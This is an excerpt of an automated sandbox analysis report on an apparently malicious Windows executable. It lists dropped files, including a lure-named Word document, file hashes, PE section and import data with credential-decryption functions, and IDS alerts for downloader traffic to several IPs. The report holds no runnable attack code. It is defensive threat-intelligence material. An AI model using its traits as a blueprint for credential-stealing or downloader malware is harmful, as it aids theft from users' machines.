                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\Desktop\e_sqlite3.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1780736
                                                                                                                                                                                                                            Entropy (8bit):6.54388973247121
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:izDLT7eXc2a+xMPDBsvh58j6OQ/K4eSlrIBizB2J4bJGtpxnvUmhEocQ0x58:iTTXkMPDjj6O0d1Z9sxnvU3Z
                                                                                                                                                                                                                            MD5:B1A10828FADDCB586CC3A9C7A01CBBBF
                                                                                                                                                                                                                            SHA1:1D7EF8581F731D77C9621045C0F2712D654EBEF0
                                                                                                                                                                                                                            SHA-256:1D2D090188CD500EB6098701690A72F090440162A651123EAB44132525597446
                                                                                                                                                                                                                            SHA-512:12171C09B03BB2E163561B9B7618B3EC8566D3162A2472A63661A1F86F26118272F3A7C6608C09640D57D992DE52A840DEB41B5EB089E19D35E45D08492ACACF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: #U2800.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..B.........A......A......A...+..A............X...*..X......X...................N..........Rich...........................PE..d.....Xg.........." .....*................................................................`A.............................................$......(....`.......`..P............p...... _..T............................_..8............@...............................text....(.......*.................. ..`.rdata......@......................@..@.data............n..................@....pdata..P....`......."..............@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\Documents\Your_Benefits_and_Role.docx

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):16036
                                                                                                                                                                                                                            Entropy (8bit):7.395550738995465
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:djbGP/uGWZmqibNxt/ZtNNjpVjan+hjregKELqJJJYc:1bGP/uJZ7iBxllNjpVjFFLC
                                                                                                                                                                                                                            MD5:8D226F80DA462D88E080C6BD6857550C
                                                                                                                                                                                                                            SHA1:8F543B99D70FFED51B1BF9C6C33791592AAD04FF
                                                                                                                                                                                                                            SHA-256:0AD7054EDB3D096B1D771D9E1FE393B98E11D2320124A1BEF51FFF9704D834E7
                                                                                                                                                                                                                            SHA-512:F3CF47989D2BF28F30F7D9867396DF8F270821C6CE298C81A226E943E4E37D194642EA1A192D77FDE9C316B417C4B082B91130A9965C6271B829EA02F895BDC0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:PK..........!.2.oWf...........[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.0.E......J.(....e.h...4ND.B.....81.$14.. ..{..1...l...w%..=...^i7+...-.d.&.0.A.6.l4...L6.0#...S.O.....X...*..V$:...B~....^.K......../P..I..~7$....i..J&B0Z.Du.t.OJ.K(H.....xG...L.+..v......dc.....W>*..\XR..m.p....Z}.....HwnM.V..n....-..")/..ZwB`.....4........s.DX...j...;A*.....c......4....[.S..9.> ......{.V.4p....W.&....A......|.d.?.......PK..........!.........N......._rels/.rels ...(...........................

                                                                                                                                                                                                                            C:\Users\user\Documents\~$ur_Benefits_and_Role.docx

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                                                            Entropy (8bit):4.696240975066777
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:MCGGhQsw1hRUDxodsYEr5luOpP+:MDbyDxDDdluOg
                                                                                                                                                                                                                            MD5:FBA34004E575223115E6EDA14D12097A
                                                                                                                                                                                                                            SHA1:B5B7DCDA60FFED6CB4C41D25EB69904350C16BB1
                                                                                                                                                                                                                            SHA-256:A065BC9D053B627B37A2178A0508191047AFEDF325501EA8D3A07EA7B24ECE94
                                                                                                                                                                                                                            SHA-512:4780535AFDEF904353E5F2C194E9123587AAD6485CCA60E161BA2264F80BE67CB2D317A7D6C4EFD1414FD19DB08DE581BF5399672499DDD1DB6F7E96B1F1889F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:............................................................R..P....G...'..Q*........1..1.5...t9".q...H.NXg.@R...G.~..&.a.I.,q.zf...........s.}..k.....Ws..=.j

                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):6.918048368256532
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:nNnzvybxiy.exe
                                                                                                                                                                                                                            File size:26'467'328 bytes
                                                                                                                                                                                                                            MD5:5a59fdc67b0a65a89ad3f08de212d442
                                                                                                                                                                                                                            SHA1:abffa79db2d55fb9190ee9e0869de3086d477ab3
                                                                                                                                                                                                                            SHA256:531da4002b1052ababc8cffc1db0ac39dc616eb051faca146a393da3dfa478eb
                                                                                                                                                                                                                            SHA512:b0028f0d8ca5e83dff7773b0923fa16773c6f117ade5dff650390d16d8b774d44d4428792ba27cb25fc4f01dfd8a68cea0af2cfba7531faa0a63052d75f5aec9
                                                                                                                                                                                                                            SSDEEP:393216:KTWNCRvdU1GqUbJMsswuYThdYzXUxvOuo5kC:8vN6WVhdYzXUxvOu
                                                                                                                                                                                                                            TLSH:C547AE15A3E80966E4BB9734C570C232DAB1BC625736D60F254DF28A1F73B418B6B732
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&...'...&...'...&...'...&...&...&...'...&...&K~.&...'...&...'...&...&...&...'...&o..'...&o..'...&Rich...&.......

                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                            Icon Hash:6796a6a5a3aba4b3

                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Entrypoint:0x140081e3c
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x6784D4E6 [Mon Jan 13 08:55:02 2025 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:cc2c0bdc589a1141f97271fa57395fb5

                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007FFAA8E32D94h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            jmp 00007FFAA8E32377h
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            jmp 00007FFAA8E33110h
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007FFAA8E3310Ch
                                                                                                                                                                                                                            jmp 00007FFAA8E32504h
                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            dec ebp
                                                                                                                                                                                                                            mov eax, dword ptr [ecx+38h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ecx, edx
                                                                                                                                                                                                                            dec ecx
                                                                                                                                                                                                                            mov edx, ecx
                                                                                                                                                                                                                            call 00007FFAA8E32512h
                                                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                            inc ebp
                                                                                                                                                                                                                            mov ebx, dword ptr [eax]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ebx, edx
                                                                                                                                                                                                                            inc ecx
                                                                                                                                                                                                                            and ebx, FFFFFFF8h
                                                                                                                                                                                                                            dec esp
                                                                                                                                                                                                                            mov ecx, ecx
                                                                                                                                                                                                                            inc ecx
                                                                                                                                                                                                                            test byte ptr [eax], 00000004h
                                                                                                                                                                                                                            dec esp
                                                                                                                                                                                                                            mov edx, ecx
                                                                                                                                                                                                                            je 00007FFAA8E32515h
                                                                                                                                                                                                                            inc ecx
                                                                                                                                                                                                                            mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                                            dec ebp
                                                                                                                                                                                                                            arpl word ptr [eax+04h], dx
                                                                                                                                                                                                                            neg eax
                                                                                                                                                                                                                            dec esp
                                                                                                                                                                                                                            add edx, ecx
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            arpl ax, cx
                                                                                                                                                                                                                            dec esp
                                                                                                                                                                                                                            and edx, ecx
                                                                                                                                                                                                                            dec ecx
                                                                                                                                                                                                                            arpl bx, ax
                                                                                                                                                                                                                            dec edx
                                                                                                                                                                                                                            mov edx, dword ptr [eax+edx]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [ebx+10h]
                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [ebx+08h]
                                                                                                                                                                                                                            test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                                                                            je 00007FFAA8E3250Dh
                                                                                                                                                                                                                            movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                                                                            and eax, FFFFFFF0h
                                                                                                                                                                                                                            dec esp
                                                                                                                                                                                                                            add ecx, eax
                                                                                                                                                                                                                            dec esp
                                                                                                                                                                                                                            xor ecx, edx
                                                                                                                                                                                                                            dec ecx
                                                                                                                                                                                                                            mov ecx, ecx
                                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                                            jmp 00007FFAA8E3251Eh
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmp ecx, dword ptr [00000079h]

                                                                                                                                                                                                                            Rich Headers

                                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x1bfef700x54.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1bfefc40x168.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ce70000x9b16.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1c440000xa26b4.pdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cf10000x1fb4.reloc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x1aab3c00x54.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x1aab5800x28.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1aab2800x140.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xc4a0000xce0.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x8f3b80x8f4001e09326bebad9beb67d1d9e0709de137False0.4275008862347295data6.659372571841724IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .managed0x910000x83ab780x83ac0065e44afa6e8850f6f1ceb419271dc187unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            hydrated0x8cc0000x37dfa00x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .rdata0xc4a0000xfb7b6c0xfb7c00e94301c3140f0fd8b6e74b0f292da3e2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0x1c020000x41d080xd80059b6f6c8423125cb05ae5eb24462d940False0.2809244791666667data5.197140717630472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .pdata0x1c440000xa26b40xa28003e08ae7a619b391a1093ebef747b17f1False0.4942127403846154data6.785049242477185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rsrc0x1ce70000x9b160x9c00c2e8d1e4e8ddf83953b54ccb43e4f002False0.038161057692307696data2.279105914051652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .reloc0x1cf10000x1fb40x2000a0ce914127ae00f330027aaf94b7aea4False0.218017578125data5.439650620836555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_ICON0x1ce71300x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.019865461425268027
                                                                                                                                                                                                                            RT_GROUP_ICON0x1cf05d80x14data1.15
                                                                                                                                                                                                                            RT_VERSION0x1cf05ec0x340data0.42427884615384615
                                                                                                                                                                                                                            RT_MANIFEST0x1cf092c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumKeyExW, RegEnumValueW, GetTokenInformation, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser
                                                                                                                                                                                                                            bcrypt.dllBCryptGenRandom, BCryptDecrypt, BCryptExportKey, BCryptFinishHash, BCryptGetProperty, BCryptHashData, BCryptImportKey, BCryptImportKeyPair, BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptCloseAlgorithmProvider, BCryptDestroyHash, BCryptCreateHash, BCryptDestroyKey, BCryptEncrypt
                                                                                                                                                                                                                            CRYPT32.dllCryptProtectData, CryptUnprotectData, CertFreeCertificateChainEngine, CertCloseStore, PFXImportCertStore, PFXExportCertStore, CryptFindOIDInfo, CryptQueryObject, CryptMsgGetParam, CryptMsgClose, CryptImportPublicKeyInfoEx2, CryptFormatObject, CryptDecodeObject, CertVerifyTimeValidity, CertSetCertificateContextProperty, CertSerializeCertificateStoreElement, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertGetCertificateContextProperty, CryptProtectMemory, CryptUnprotectMemory, CertAddCertificateContextToStore, CertAddCertificateLinkToStore, CertControlStore, CertCreateCertificateChainEngine, CertFindCertificateInStore, CertFindExtension, CertFreeCertificateChain, CertGetCertificateChain, CertGetIntendedKeyUsage, CertGetNameStringW, CertGetValidUsages, CertNameToStrW, CertOpenStore, CertSaveStore
                                                                                                                                                                                                                            IPHLPAPI.DLLGetAdaptersAddresses, GetPerAdapterInfo, GetNetworkParams, if_nametoindex
                                                                                                                                                                                                                            KERNEL32.dllRtlUnwindEx, RtlPcToFileHeader, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, IsDebuggerPresent, InitializeSListHead, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, RaiseException, UnhandledExceptionFilter, QueryPerformanceCounter, SetLastError, FormatMessageW, GetLastError, GetCPInfoExW, GetConsoleScreenBufferInfo, GetConsoleMode, GetFileType, ReadFile, ReadConsoleW, SetConsoleTextAttribute, WriteFile, WriteConsoleW, GetConsoleOutputCP, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, GetTickCount64, K32EnumProcessModulesEx, CloseHandle, IsWow64Process, GetExitCodeProcess, CreateProcessW, TerminateProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, QueryFullProcessImageNameW, CreatePipe, GetCurrentProcess, GetConsoleCP, GetLogicalDrives, GetProcAddress, LoadLibraryW, LoadLibraryExW, CancelIoEx, CloseThreadpoolIo, GetCurrentProcessId, RaiseFailFastException, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, EnumSystemLocalesEx, ResolveLocaleName, LCIDToLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetCurrentThread, WaitForSingleObject, Sleep, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, InitializeCriticalSection, InitializeConditionVariable, CreateThreadpoolTimer, SetThreadpoolTimer, WaitForMultipleObjectsEx, GetCurrentThreadId, CreateThreadpoolWait, SetThreadpoolWait, WaitForThreadpoolWaitCallbacks, CloseThreadpoolWait, CreateThreadpoolWork, CloseThreadpoolWork, SubmitThreadpoolWork, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, GetCPInfo, LocalAlloc, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CancelSynchronousIo, CreateIoCompletionPort, CopyFileExW, CreateDirectoryW, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, ExpandEnvironmentStringsW, FindNextFileW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetCurrentDirectoryW, GetFileAttributesExW, GetFileInformationByHandleEx, GetModuleFileNameW, GetOverlappedResult, GetSystemDirectoryW, OpenThread, QueryUnbiasedInterruptTime, RemoveDirectoryW, SetFileInformationByHandle, SetFilePointerEx, SetThreadErrorMode, CreateThread, ResumeThread, GetThreadPriority, SetThreadPriority, GetDynamicTimeZoneInformation, GetTimeZoneInformation, GetCurrentProcessorNumberEx, SetEvent, ResetEvent, CreateEventExW, GetEnvironmentVariableW, SetEnvironmentVariableW, SetFileAttributesW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, SuspendThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, DebugBreak, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, EncodePointer, DecodePointer, HeapCreate, HeapDestroy, HeapAlloc, HeapFree, GetProcessHeap, RtlLookupFunctionEntry
                                                                                                                                                                                                                            ncrypt.dllNCryptOpenStorageProvider, NCryptOpenKey, NCryptFreeObject, NCryptDeleteKey, NCryptImportKey, NCryptSetProperty, NCryptGetProperty
                                                                                                                                                                                                                            ole32.dllCoGetObjectContext, CoInitializeEx, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc, CoGetApartmentType, CoGetContextToken, CoCreateGuid, CLSIDFromProgID, CoWaitForMultipleHandles
                                                                                                                                                                                                                            OLEAUT32.dllVariantClear, SysFreeString, SysAllocStringLen
                                                                                                                                                                                                                            USER32.dllLoadStringW
                                                                                                                                                                                                                            WS2_32.dllWSAIoctl, WSAEventSelect, FreeAddrInfoExW, WSACleanup, WSAStartup, bind, WSARecv, WSAGetOverlappedResult, WSAConnect, shutdown, setsockopt, send, getpeername, getsockopt, select, ioctlsocket, recv, WSASend, closesocket, GetNameInfoW, GetAddrInfoW, FreeAddrInfoW, WSASocketW, GetAddrInfoExW
                                                                                                                                                                                                                            api-ms-win-crt-heap-l1-1-0.dllfree, _set_new_mode, _callnewh, calloc, realloc, malloc
                                                                                                                                                                                                                            api-ms-win-crt-math-l1-1-0.dllnanf, fmod, fmodf, __setusermatherr, ceil, cos, exp, floor, log, log10, pow, sin, tan, modf, ceilf, cosf, expf, floorf, logf, powf, sinf, modff, log2, atan2, fma, acosh, asinh, atanh, cosh, sinh, tanh, cbrt, acos, asin, atan, log2f, atan2f, fmaf, acoshf, asinhf, atanhf, coshf, sinhf, tanhf, log10f, cbrtf, acosf, asinf, atanf, tanf, nan
                                                                                                                                                                                                                            api-ms-win-crt-string-l1-1-0.dllstrcpy_s, strncpy_s, _stricmp, strcmp, wcsncmp
                                                                                                                                                                                                                            api-ms-win-crt-convert-l1-1-0.dllstrtoull
                                                                                                                                                                                                                            api-ms-win-crt-runtime-l1-1-0.dll__p___wargv, __p___argc, _exit, exit, terminate, _initterm_e, _initterm, _crt_atexit, abort, _get_initial_wide_environment, _initialize_wide_environment, _configure_wide_argv, _c_exit, _set_app_type, _initialize_onexit_table, _seh_filter_exe, _register_onexit_function, _register_thread_local_exe_atexit_callback, _cexit
                                                                                                                                                                                                                            api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsscanf, __stdio_common_vsprintf_s, _set_fmode, __stdio_common_vfprintf, __acrt_iob_func, __p__commode
                                                                                                                                                                                                                            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                                                                                                                                                                                            Exports

                                                                                                                                                                                                                            NameOrdinalAddress
                                                                                                                                                                                                                            DotNetRuntimeDebugHeader10x141c0e920

                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                            2025-01-14T12:48:10.843145+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749701172.65.251.78443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:10.973026+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749704172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:10.977753+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749703172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:10.981681+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749709172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:10.982287+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749708172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:10.985819+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749712172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:10.998603+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749711172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:11.000647+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749710172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:11.004447+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749705172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:11.008321+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749706172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:11.008921+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749707172.217.16.206443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:12.272299+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749714142.250.186.100443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:12.277450+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749723142.250.186.100443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:12.281430+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749720142.250.186.100443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:12.284118+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749718142.250.186.100443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:12.284370+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749716142.250.186.100443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:12.302120+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749717142.250.186.100443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:12.304866+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749722142.250.186.100443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:12.308245+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749721142.250.186.100443TCP
                                                                                                                                                                                                                            2025-01-14T12:48:12.316105+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749719142.250.186.100443TCP
